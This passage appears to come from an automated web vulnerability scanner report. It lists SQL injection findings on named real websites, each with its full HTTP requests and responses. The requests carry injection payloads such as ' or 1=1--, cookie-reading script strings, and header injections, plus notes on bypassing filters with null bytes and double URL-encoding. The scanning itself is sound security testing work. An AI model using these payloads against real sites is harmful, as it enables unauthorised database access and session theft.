margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_login.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} .menulist ul li{ float:none; margin:0; margin-bottom:-1px; margin-top:-2px; color:#fff; filter:alpha(opacity=95); -moz-opacity:.05; opacity:.95; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px} .menulist ul li a:hover{ float:none; margin:0; background-color:#666; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px; color:#fff} .menulist a{ display:block; padding:3px; color:#fff; text-decoration:none; text-align:left} .menulist a:hover, .menul
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.intranetjournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d2--%20
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 15:59:40 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Mar 2011 16:00:40 GMT
Connection: close
Content-Type: text/html
Content-Length: 151215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661094/661076/661075/581331/581034;s=9539;x=7936;f=983649340;u=j;z=20110318115940" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661094/661076/661075/581331/581034;s=9539;x=7936;f=983649340;u=j;z=20110318115940" alt="Click here"></a>
</noscript>
</span>
<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_dn.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} #menulist_cust li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_login.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} .menulist ul li{ float:none; margin:0; margin-bottom:-1px; margin-top:-2px; color:#fff; filter:alpha(opacity=95); -moz-opacity:.05; opacity:.95; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px} .menulist ul li a:hover{ float:none; margin:0; background-color:#666; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px; color:#fff} .menulist a{ display:block; padding:3px; color:#fff; text-decoration:none; text-align:left} .menulist a:hover, .menul
...[SNIP]...
1.119. http://www.masstransitmag.com/online/article.jsp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.masstransitmag.com
Path:   /online/article.jsp

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payloads 13150409'%20or%201%3d1--%20 and 13150409'%20or%201%3d2--%20 were each submitted in the id parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d13150409'%20or%201%3d1--%20&pageNum=1 HTTP/1.1
Host: www.masstransitmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:14:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=9480DF2361A4B8CC2E189CB9CBDB1696.transportation-app1; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 49345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb='http:/
...[SNIP]...
<br> -->

   <span class="CommentHeader">Comments</span><BR>
   <BR>
   <a name="post_msg"></a></font>

   

   <!--
   <span class="SortBy">Sort by Post:
   <a href="/online/article.jsp?id=1358448181--><script>alert(document.cookie)</script>c11697f1d6d13150409' or 1=1-- &amp;OrderBy=InsertDate&amp;Dir=DESC">Most Recent</a>
   &ndash;
   <a href="/online/article.jsp?id=1358448181--><script>alert(document.cookie)</script>c11697f1d6d13150409' or 1=1-- &amp;OrderBy=InsertDate&amp;Dir=ASC">First Comment</a>
   <BR>
   -->
   
       <form action='/includes/comment_abuse.jsp?id=60797' target="_new" method="post">
       <div class="comment">
           <table width="100%" id="commentsTable" cellpadding="0" cellspacing="0">
               <tr>
                   <td width="70%" valign="top">
                       <div class="commentTop">Posted by <b>kmack</b> in Washington DC Metro </div>
                   </td>
       <td width="30%" align="right" valign="top" style="padding-left:4px;">
                       <div class="userDate">(08/25/10 - 11:05 AM)</div>
                   </td>
   </tr>
           </table>
           
           <div class="commentEntry">
               <div class="userSubject">Cummins CNG</div>
               <div class="userComment">Too bad Cummins seems incapable of figuring out their own CNG engines. They have had one bus since April and still havent been able to get it running correctly</div>
               <div class="commentReport">
                   <br>
                   <select name="reportType">
                       <option value="N/A">Select a Reason</option>
                       <option value="Spam">Spam</option>
                       <option value="Profanity / Language">Profanity / Language</option>
                       <option value="Personal Insult">Personal Insult</option>
                       <option value="Factual Error">Factual Error</option>
                   </select>
                   <input type="submit" name="reportComment" value="Report Comment">
               </div>
           </div>
           <div class="commentBottom"></div>
       </div>
       </form>
       <BR>
       <BR>
       
       <form action='/includes/comment_abuse.jsp?id=60799' target="_new" method="post">
       <div class="comment">
           <table wi
...[SNIP]...

Request 2

GET /online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d13150409'%20or%201%3d2--%20&pageNum=1 HTTP/1.1
Host: www.masstransitmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:14:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=33D33115EF50D3415CA16C6D684D81C4.transportation-app2; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb='http:/
...[SNIP]...
<br> -->

<div align="right">
   
</div>

<div align="right">
   
</div>

<a name="commentform"></a></font>

   <hr>
   <div class="CommentForm">
       <form name="form" method="post" action="/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d13150409'%20or%201%3d2--%20&pageNum=1" class="commentform" onSubmit="JavaScript: return checkit(form)">    
           
           <input type="hidden" name="submit_comment" value="y">
           <input type="hidden" name="PostProc" value="T" />
           <input type="hidden" name="ArtID" value="1358448181--><script>alert(document.cookie)</script>c11697f1d6d13150409' or 1=2-- " />
           <input type="hidden" name="ArtTitle" value="" />
           <input type="hidden" name="ReplyID" value="" />
   
           <!-- <h2><span>Submit</span> a Comment</h2> -->
           <font size="+2"><b>Submit a Comment</b></font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span class="UserInstructions">(comments will appear after this article, as well as on our <a href='http://www.masstransitmag.com/readersrespond/'>Readers Respond Page</a>)</span>
           <a name="formstart">&nbsp;</a>
           <table width="500" border="0">
               <tr>
                   <td width="105" nowrap><span class="req"> *</span><span class="CommentName">Name: </span></td>
                   <td width="385"><span class="CommentName"><input name="Name" type="text" id="Name" value="" size="38" maxlength="150" /></span></td>
               </tr>
               <tr>
                   <td nowrap><span class="CommentSubject">&nbsp;Subject:</span></td>
                   <td><span class="CommentLocation"><input name="Subject" type="text" id="Subject" value="" size="45" maxlength="150" /></span></td>
               </tr>
               <tr>
                   <td nowrap><span class="CommentLocation">&nbsp;City, State:</span></td>
                   <td><span class="CommentSubject"><input name="Location" type="text" id="Location" size="40" maxlength="200" value="" /></span></td>
               </tr>
               <tr>
                   <td nowrap><span class="CommentComment1"><span class="req">*</span><label for="label2">Comment:<span class="Comment
...[SNIP]...
1.120. https://www.networksolutions.com/manage-it/renewal-center.jsp [7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.networksolutions.com
Path:   /manage-it/renewal-center.jsp

Issue detail

The 7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83 parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /manage-it/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83%00' HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:43 GMT
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=iWrv; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=de83d3f8822ca01e1417623d5cf3; Expires=Wed, 12-Apr-2079 19:59:49 GMT; Path=/
Set-cookie: siteId=527-10; Expires=Mon, 19-Mar-2012 16:45:43 GMT; Path=/
Set-cookie: JSESSIONID=de83d3f8822ca01e1417623d5cf3; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Content-type: text/html;charset=UTF-8
Content-length: 31671
Date: Fri, 25 Mar 2011 16:45:43 GMT
Set-cookie: vertigo=false; Expires=Sat, 24-Mar-2012 16:45:43 GMT; Path=/
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html;charset=utf-8"></meta>
       
       
...[SNIP]...
<input type="hidden" name="errorPage" value="/common/error.jsp" />
...[SNIP]...
<input type="hidden" name="authenticationFailedPage" value="" />
...[SNIP]...

Request 2

GET /manage-it/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83%00'' HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:45 GMT
X-powered-by: Servlet/2.5
Location: https://www.networksolutions.com/session-exceeded.html
Content-type: text/html; charset=iso-8859-1
Content-length: 0
Date: Fri, 25 Mar 2011 16:45:44 GMT
Connection: close

1.121. https://www.networksolutions.com/manage-it/renewal-center.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.networksolutions.com
Path:   /manage-it/renewal-center.jsp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /manage-it%2527/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:46:20 GMT
Location: https://www.networksolutions.com/common/error.jsp
Content-type: text/html;charset=UTF-8
Date: Fri, 25 Mar 2011 16:46:19 GMT
Set-cookie: JROUTE=tUzY.tUzY; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Connection: close

Request 2

GET /manage-it%2527%2527/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:46:24 GMT
X-powered-by: Servlet/2.5
Location: https://www.networksolutions.com/session-exceeded.html
Content-type: text/html; charset=iso-8859-1
Content-length: 0
Date: Fri, 25 Mar 2011 16:46:24 GMT
Connection: close

1.122. https://www.networksolutions.com/manage-it/renewal-center.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.networksolutions.com
Path:   /manage-it/renewal-center.jsp

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /manage-it/renewal-center.jsp' HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:55 GMT
Content-type: text/html
Last-modified: Fri, 18 Mar 2011 14:59:06 GMT
Content-length: 25921
Etag: W/"6541-4d83733a"
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Error | Network Solutions</title>
...[SNIP]...

Request 2

GET /manage-it/renewal-center.jsp'' HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:46:00 GMT
Content-type: text/html
Last-modified: Fri, 18 Mar 2011 14:59:05 GMT
Content-length: 1875
Etag: W/"753-4d837339"
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>Domain Names, Web Hosting and Online Marketing Services | Network Solutio
...[SNIP]...
1.123. https://www.networksolutions.com/manage-it/renewal-center.jsp [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.networksolutions.com
Path:   /manage-it/renewal-center.jsp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /manage-it/renewal-center.jsp HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:43 GMT
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=KTdR; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=de83d9b2262e100f1f56a2624062; Expires=Wed, 12-Apr-2079 19:59:49 GMT; Path=/
Set-cookie: siteId=527-10; Expires=Mon, 19-Mar-2012 16:45:43 GMT; Path=/
Set-cookie: JSESSIONID=de83d9b2262e100f1f56a2624062; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Content-type: text/html;charset=UTF-8
Content-length: 31271
Date: Fri, 25 Mar 2011 16:45:43 GMT
Set-cookie: vertigo=false; Expires=Sat, 24-Mar-2012 16:45:43 GMT; Path=/
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html;charset=utf-8"></meta>
       
       
...[SNIP]...
<input type="hidden" name="errorPage" value="/common/error.jsp" />
...[SNIP]...
<input type="hidden" name="authenticationFailedPage" value="" />
...[SNIP]...

Request 2

GET /manage-it/renewal-center.jsp HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:47 GMT
X-powered-by: Servlet/2.5
Location: https://www.networksolutions.com/session-exceeded.html
Content-type: text/html; charset=iso-8859-1
Content-length: 0
Date: Fri, 25 Mar 2011 16:45:47 GMT
Connection: close

1.124. https://www.networksolutions.com/manage-it/renewal-center.jsp [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.networksolutions.com
Path:   /manage-it/renewal-center.jsp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /manage-it/renewal-center.jsp HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:39 GMT
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=KTdR; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=de82e9f1b9c886fb3cd5a6768f84; Expires=Wed, 12-Apr-2079 19:59:45 GMT; Path=/
Set-cookie: siteId=527-10; Expires=Mon, 19-Mar-2012 16:45:39 GMT; Path=/
Set-cookie: JSESSIONID=de82e9f1b9c886fb3cd5a6768f84; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Content-type: text/html;charset=UTF-8
Content-length: 31672
Date: Fri, 25 Mar 2011 16:45:39 GMT
Set-cookie: vertigo=false; Expires=Sat, 24-Mar-2012 16:45:39 GMT; Path=/
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html;charset=utf-8"></meta>
       
       
...[SNIP]...
<input type="hidden" name="errorPage" value="/common/error.jsp" />
...[SNIP]...
<input type="hidden" name="authenticationFailedPage" value="" />
...[SNIP]...

Request 2

GET /manage-it/renewal-center.jsp HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:41 GMT
X-powered-by: Servlet/2.5
Location: https://www.networksolutions.com/session-exceeded.html
Content-type: text/html; charset=iso-8859-1
Content-length: 0
Date: Fri, 25 Mar 2011 16:45:40 GMT
Connection: close

1.125. https://www.networksolutions.com/manage-it/renewal-center.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.networksolutions.com
Path:   /manage-it/renewal-center.jsp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /manage-it/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E6fa7b01d733=1&1%00'=1 HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:46 GMT
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=KTdR; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=de847c5570a1f0a26cd6350b43c6; Expires=Wed, 12-Apr-2079 19:59:52 GMT; Path=/
Set-cookie: siteId=527-10; Expires=Mon, 19-Mar-2012 16:45:46 GMT; Path=/
Set-cookie: JSESSIONID=de847c5570a1f0a26cd6350b43c6; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Content-type: text/html;charset=UTF-8
Content-length: 31668
Date: Fri, 25 Mar 2011 16:45:46 GMT
Set-cookie: vertigo=false; Expires=Sat, 24-Mar-2012 16:45:46 GMT; Path=/
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html;charset=utf-8"></meta>
       
       
...[SNIP]...
<input type="hidden" name="errorPage" value="/common/error.jsp" />
...[SNIP]...
<input type="hidden" name="authenticationFailedPage" value="" />
...[SNIP]...

Request 2

GET /manage-it/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E6fa7b01d733=1&1%00''=1 HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:47 GMT
X-powered-by: Servlet/2.5
Location: https://www.networksolutions.com/session-exceeded.html
Content-type: text/html; charset=iso-8859-1
Content-length: 0
Date: Fri, 25 Mar 2011 16:45:47 GMT
Connection: close

1.126. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [3906b%22%3E%3Cscript%3Ealert(document.cookie parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The 3906b%22%3E%3Cscript%3Ealert(document.cookie parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 3906b%22%3E%3Cscript%3Ealert(document.cookie parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(document.cookie' HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:34 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=r16gob2tum7a692c66cjs8qc30; path=/
Connection: close
Content-Type: text/html
Content-Length: 7707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b' at line 1

Request 2

GET /xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(document.cookie'' HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:35 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=jr6imn8pf5rg9jjm7ui0d6eec2; path=/
Connection: close
Content-Type: text/html
Content-Length: 22962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
1.127. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The 3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780=1' HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=6infg0q6aruev1efa0hht920l4; path=/
Connection: close
Content-Type: text/html
Content-Length: 7734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b' at line 1

Request 2

GET /xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780=1'' HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=2ctknn60p014qmkdcg3cidgeu0; path=/
Connection: close
Content-Type: text/html
Content-Length: 22989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
1.128. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

